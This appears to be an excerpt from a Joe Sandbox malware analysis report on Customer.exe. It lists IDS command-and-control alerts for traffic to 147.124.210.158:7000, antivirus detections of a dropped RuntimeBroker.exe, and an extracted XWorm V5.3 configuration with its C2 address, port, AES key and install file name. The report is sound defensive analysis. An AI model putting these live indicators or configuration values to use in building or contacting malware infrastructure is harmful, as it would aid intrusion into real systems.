            2025-01-07T17:04:18.269196+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:18.327661+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:23.600347+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:23.751258+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:23.844885+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:23.910954+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:23.924018+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:24.008433+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:24.021239+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:24.105852+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:24.110799+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:25.292770+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:34.134426+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:34.235462+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:34.332404+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:34.592445+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:44.385296+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:44.482149+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:44.487184+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:48.295850+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:51.090494+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:51.447906+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:53.247876+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:55.930707+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:59.759060+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:59.816394+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:59.858119+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:04:59.991792+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:00.063084+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:00.092042+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:00.160249+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:01.853889+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:06.024070+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:08.166136+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:16.087337+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:16.142060+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:16.184507+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:16.239345+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:18.289912+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:23.544544+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:26.357701+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:26.454794+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:31.419268+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:31.634964+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:31.732017+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:35.188552+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.294930+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.404563+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.514930+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.622372+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.731845+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.841904+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.950635+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.059877+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.191442+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.315928+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.419357+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.528749+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.640590+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.748199+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.860621+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.966489+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.075581+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.244825+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.294350+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.403621+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.540835+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.622368+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.759076+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.841236+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.950683+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.059975+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.169292+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.307024+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.388199+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.527090+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.608606+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.718754+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.826729+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.947101+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.046741+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.154692+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.263494+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.372318+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.482331+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.593101+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.700751+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.809805+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.919449+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.028581+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.151019+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.247349+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.356855+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.466075+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.576024+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.684798+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.796567+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.903602+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.024680+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.123061+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.231950+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.352682+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.466153+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.576576+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.685190+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.781516+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:41.794258+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.122565+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.231848+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.341234+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.450570+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.559826+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.672578+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.778647+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.890925+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.999755+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.106771+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.216601+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.335977+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.435021+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.544248+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.653663+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.764691+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.872852+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.982271+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.091191+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.202560+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.309838+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.420049+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.529499+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.654771+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.773308+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.888022+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:45.019149+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:45.106945+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:45.216068+010028529231Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:51.838587+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:52.229378+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:52.326930+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:52.454590+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:52.551652+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:52.655596+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:52.708815+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            2025-01-07T17:05:52.918612+010028529231Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T17:02:22.731373+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:02:52.744766+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:22.752150+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:52.753623+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:03:52.970947+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:22.760060+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:22.970896+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:04:52.777903+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:22.774767+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            2025-01-07T17:05:52.782786+010028528741Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T17:05:35.188552+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.294930+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.404563+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.514930+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.622372+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.731845+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.841904+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:35.950635+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.059877+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.191442+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.315928+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.419357+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.528749+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.640590+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.748199+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.860621+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:36.966489+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.075581+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.244825+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.294350+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.403621+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.540835+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.622368+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.759076+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.841236+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:37.950683+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.059975+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.169292+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.307024+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.388199+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.527090+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.608606+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.718754+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.826729+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:38.947101+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.046741+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.154692+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.263494+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.372318+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.482331+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.593101+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.700751+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.809805+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:39.919449+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.028581+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.151019+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.247349+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.356855+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.466075+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.576024+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.684798+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.796567+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:40.903602+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.024680+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.123061+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.231950+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.352682+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.466153+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.576576+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.685190+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:41.794258+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.122565+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.231848+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.341234+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.450570+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.559826+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.672578+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.778647+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.890925+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:42.999755+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.106771+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.216601+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.335977+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.435021+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.544248+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.653663+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.764691+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.872852+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:43.982271+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.091191+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.202560+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.309838+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.420049+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.529499+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.654771+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.773308+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:44.888022+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:45.019149+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:45.106945+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            2025-01-07T17:05:45.216068+010028528731Malware Command and Control Activity Detected192.168.2.450010147.124.210.1587000TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T17:03:32.388043+010028531931Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T17:05:34.826649+010028531911Malware Command and Control Activity Detected147.124.210.1587000192.168.2.449737TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T17:05:33.724823+010028531921Malware Command and Control Activity Detected192.168.2.449737147.124.210.1587000TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T17:02:07.042714+010018100032Potentially Bad Traffic185.199.111.133443192.168.2.449736TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-07T17:02:06.437911+010018100002Potentially Bad Traffic192.168.2.449735140.82.121.4443TCP
            2025-01-07T17:02:07.042650+010018100002Potentially Bad Traffic192.168.2.449736185.199.111.133443TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
            Found malware configuration
            Source: 00000006.00000002.4116258187.00000000033A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["147.124.210.158"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.3"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeReversingLabs: Detection: 91%
            Multi AV Scanner detection for submitted file
            Source: Customer.exeReversingLabs: Detection: 50%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: Customer.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmpString decryptor: 147.124.210.158
            Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmpString decryptor: 7000
            Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmpString decryptor: <123456789>
